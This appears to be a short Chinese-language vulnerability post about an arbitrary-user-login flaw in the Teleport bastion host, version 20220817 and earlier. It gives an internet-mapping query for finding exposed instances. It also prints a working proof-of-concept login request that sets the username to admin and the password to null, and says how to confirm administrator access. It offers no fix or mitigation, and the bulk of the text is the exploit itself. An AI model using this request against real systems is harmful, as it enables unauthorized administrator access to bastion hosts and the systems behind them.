Teleport堡垒机 do-login 任意用户登录漏洞

漏洞描述

Teleport堡垒机存在任意用户登录漏洞,攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限。

漏洞影响

Teleport Version <= 20220817

网络测绘

app=”TELEPORT堡垒机”

漏洞复现

登录页面

20240328151524546-png (28)

验证POC, captcha参数为验证码

POST /auth/do-login

args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}

20240328151816715-png (1)

code 返回 0 即为成功,再访问 /dashboard 获取管理员权限

20240328151844572-png (2)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容